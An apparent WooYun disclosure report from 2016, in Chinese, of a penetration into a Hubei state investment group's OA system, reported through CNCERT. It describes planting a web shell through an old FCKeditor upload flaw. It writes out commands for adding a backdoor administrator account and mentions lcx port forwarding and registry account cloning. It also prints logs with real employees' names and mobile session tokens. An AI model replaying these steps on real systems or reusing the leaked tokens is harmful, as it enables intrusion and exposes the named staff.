当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208632

漏洞标题:湖北省联投集团某系统内网渗透

相关厂商:湖北省联合发展投资集团有限公司

漏洞作者: 路人甲

提交时间:2016-05-16 21:40

修复时间:2016-07-03 15:20

公开时间:2016-07-03 15:20

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-19: 厂商已经确认,细节仅向厂商公开
2016-05-29: 细节向核心白帽子及相关领域专家公开
2016-06-08: 细节向普通白帽子公开
2016-06-18: 细节向实习白帽子公开
2016-07-03: 细节向公众公开

简要描述:

湖北省联合发展投资集团有限公司(以下简称“联投集团”)于2008年9月正式成立,诞生于武汉城市圈“两型”社会综合配套试验区获批的历史时刻,肩负着以“政府引导,市场化运作”的经营宗旨,探索城市化发展新模式的历史使命。作为湖北省人民政府直属的国有大型控股公司,联投集团由联投控股和武汉城市圈九市国资委为主要出资人,武汉钢铁集团、东风汽车公司、中国长江三峡集团公司、中国三江航天工业集团公司、葛洲坝集团股份有限公司、湖北省烟草公司等7家省内央企为股东,公司注册资本金达32亿元。近几年,公司积极引进战略投资者联合发展, 截至2014年8月,公司注册资本增加至43.3亿元人民币。

详细说明:

联投OA
http://**.**.**.**/themes/mskin/login/login.jsp

0.png


低版本FCK可以上传任意文件,发现前辈的痕迹
http://**.**.**.**/components/fck/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

1.png


漏洞证明:

上传大马,链接
http://**.**.**.**/uploadfiles/File/404.jsp

2.png


内网服务器,交互器层面开启了NAT Server服务

Windows IP 配置
以太网适配器 本地连接 8:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::68f4:8fa4:84ee:dc01%24
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**
以太网适配器 本地连接 9:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接 6:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接 4:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 isatap.{D339B9F8-F637-425C-9BDC-5A6863B04BD9}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 本地连接* 4:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 isatap.{1E62FD0A-D0E7-4800-8DC3-27B1105BFDE3}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 isatap.{02582089-F2D3-4601-A9B3-6D4C48E2EE0C}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 isatap.{C48D766B-8629-4528-9385-71582B2E4B0C}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :


可威胁内网

**.**.**.** >> IIS7>>Microsoft-IIS/7.5 >>Success
**.**.**.** >> >>Microsoft-IIS/7.5 >>Success
http://**.**.**.** >> >>Apache-Coyote/1.1 >>Success
**.**.**.** >> Welcome to nginx!>>nginx/1.9.15 >>Success
**.**.**.** >> >>Microsoft-IIS/7.5 >>Success
**.**.**.** >> �̳��� HR���ֲ�>>Microsoft-IIS/7.5 >>Success
**.**.**.** >> 137139生活娱乐导航--在线生活娱乐从这里开始!>>Microsoft-IIS/6.0 >>Success


3389端口打开,远程登陆服务开启,1433端口打开,监听mssql数据库服务

4.png


当前用户为管理员权限

6.png


创建用户test,提权到管理员

net user test pass123456!@#$ /add 
net localgroup administrators test /add


上传lcx,准备端口转发

5.png


远程连接成功

10.png


修改注册表,克隆管理员用户重新登陆

21.png


Tomcat在线日志

2016-05-14 16:26:36,244 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
蒋曲-->token:
hreq.getRequestURI(): /mobile/loginModule
当前的url请求:    /mobile/loginModule
请求己通过验证!
2016-05-14 16:26:36,353 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
--------updateDeviceToken---------:  3ed98bfce1071a41437105738c2d4355a64b01f9d3979412b741e032dba49226
客户端请求中,appname为workflow.............
蒋曲-->token:3ed98bfce1071a41437105738c2d4355a64b01f9d3979412b741e032dba49226
hreq.getRequestURI(): /mobile/workflowModule/workflowfiles/todoNewList
当前的url请求:    /mobile/workflowModule/workflowfiles/todoNewList
validate tokenId: E2913AD88EE14802979B8FB2E2045013
2016-05-14 16:26:36,821 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
请求己通过验证!
hreq.getRequestURI(): /mobile/workflowModule/workflowfiles/todoNewList
当前的url请求:    /mobile/workflowModule/workflowfiles/todoNewList
validate tokenId: E2913AD88EE14802979B8FB2E2045013
2016-05-14 16:26:40,581 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
请求己通过验证!
hreq.getRequestURI(): /mobile/workflowModule/workflowfiles/todoNewList
当前的url请求:    /mobile/workflowModule/workflowfiles/todoNewList
validate tokenId: E2913AD88EE14802979B8FB2E2045013
2016-05-14 16:26:48,490 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
请求己通过验证!
hreq.getRequestURI(): /mobile/workflowModule/workflowfiles/todoNewList
当前的url请求:    /mobile/workflowModule/workflowfiles/todoNewList
validate tokenId: E2913AD88EE14802979B8FB2E2045013
2016-05-14 16:26:50,970 INFO [**.**.**.**mon.MobileUserCache] - <当前在线手机用户数为:1>
请求己通过验证!


泄露手机用户TokenID

hreq.getRequestURI(): //mobile/workflowModule/workflowfiles/todoNewList
当前的url请求:    //mobile/workflowModule/workflowfiles/todoNewList
validate tokenId: null
#####tokenId:null
#####element:null
####################printalltokens##########
user:李文斌,李文斌_ky,78
token:45DBD2E1CA7A4E1A882F86F18451DE7B
user:邓锦,邓锦,31
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:周森,周森,689
token:9312FD900179430E8F0ED82E74E4249C
token:B70B9258C479425BB5D03953B7FC4163
token:FFF0BC25AF4A475A800C414334986B52
token:A831E64DB2E341A88151F312C46D4963
token:EE9F271F1982464BA1912DA5BE2DE1C9
token:E8C4DA5EBF334D10B1A8E890DF1DC01F
user:周均清,周均清,8
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:郑羡,郑羡_ltxc,285
user:李军,李军,9
user:曾津,曾津,11
user:李红云,李红云,3
token:9E830479654D4AD4B1F71D07090A36B0
token:6668E506B16C41298D3029905A0C6B4C
token:9108DB78F37B42A0A128A1FCD4044228
token:BB3002D7D4A9440AB137E8DCEFD918C5
user:刘行念,刘行念,4
user:彭晓璐,彭晓璐,29
user:李军,李军,9
user:周均清,周均清,8
user:周均清,周均清,8
user:邓锦,邓锦,31
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:张敏容,张敏容,45
token:1F0B43A2B6F143A78E89971AAE6E4A49
user:刘光辉,刘光辉,346
token:138505FC01D9443582999D431230C1AD
token:685294DA36614F55B1E3985A19A4923C
user:项益明,项益明,73
user:周敏,周敏,19
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:李军,李军,9
user:周均清,周均清,8
user:姚劲松,姚劲松_fhgs,1846
token:92F217E75CB74795BD89789C7A94CFC4
token:6C3015ADF3684DB29CB0EAC4E1D7E712
token:61FD61BAB53E4BCB8DB6900344FC6F38
token:B7DA0C0B321E409092B8BDA3D38A541F
token:7F7A13116B6F48BEB44D607607D11EBD
token:AFF47EA411CE4B5E9A31A6B7DA8494C2
token:00362ED1E30447BEB7042FB4382BA800
token:E983AFDD25EF4A688514B1971EA34CA3
user:项益明,项益明,73
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:罗侃,罗侃_ltxc,1723
user:周森,周森,689
token:9312FD900179430E8F0ED82E74E4249C
token:B70B9258C479425BB5D03953B7FC4163
token:FFF0BC25AF4A475A800C414334986B52
token:A831E64DB2E341A88151F312C46D4963
token:EE9F271F1982464BA1912DA5BE2DE1C9
token:E8C4DA5EBF334D10B1A8E890DF1DC01F
user:李军,李军,9
user:干志文,干志文,46
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:曾津,曾津,11
user:项益明,项益明,73
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:姚劲松,姚劲松_fhgs,1846
token:92F217E75CB74795BD89789C7A94CFC4
token:6C3015ADF3684DB29CB0EAC4E1D7E712
token:61FD61BAB53E4BCB8DB6900344FC6F38
token:B7DA0C0B321E409092B8BDA3D38A541F
token:7F7A13116B6F48BEB44D607607D11EBD
token:AFF47EA411CE4B5E9A31A6B7DA8494C2
token:00362ED1E30447BEB7042FB4382BA800
token:E983AFDD25EF4A688514B1971EA34CA3
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:周森,周森,689
token:9312FD900179430E8F0ED82E74E4249C
token:B70B9258C479425BB5D03953B7FC4163
token:FFF0BC25AF4A475A800C414334986B52
token:A831E64DB2E341A88151F312C46D4963
token:EE9F271F1982464BA1912DA5BE2DE1C9
token:E8C4DA5EBF334D10B1A8E890DF1DC01F
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:李红云,李红云,3
token:9E830479654D4AD4B1F71D07090A36B0
token:6668E506B16C41298D3029905A0C6B4C
token:9108DB78F37B42A0A128A1FCD4044228
token:BB3002D7D4A9440AB137E8DCEFD918C5
user:祝向军,祝向军,1976
token:6187375A9ED140B780052A29AB623B1E
token:EC168251651E40A0BA4C1FB3EF9015FF
token:8E36577A11B3463DA102E65C641EA3E6
user:项益明,项益明,73
user:李红云,李红云,3
token:9E830479654D4AD4B1F71D07090A36B0
token:6668E506B16C41298D3029905A0C6B4C
token:9108DB78F37B42A0A128A1FCD4044228
token:BB3002D7D4A9440AB137E8DCEFD918C5
user:李文斌,李文斌_ky,78
token:45DBD2E1CA7A4E1A882F86F18451DE7B
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:李军,李军,9
user:胡丹兵,胡丹兵,1996
user:李军,李军,9
user:曾津,曾津,11
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:丁振国,丁振国,5
token:B42207C2D3E645478DBE7BF50BE32672
token:662A5069BAC5458389649B7BA5F9C369
user:李红云,李红云,3
token:9E830479654D4AD4B1F71D07090A36B0
token:6668E506B16C41298D3029905A0C6B4C
token:9108DB78F37B42A0A128A1FCD4044228
token:BB3002D7D4A9440AB137E8DCEFD918C5
user:李军,李军,9
user:干志文,干志文,46
user:李军,李军,9
user:周森,周森,689
token:9312FD900179430E8F0ED82E74E4249C


点到为止,就不再继续深入了

修复方案:

请尽快修复!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-05-19 15:13

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价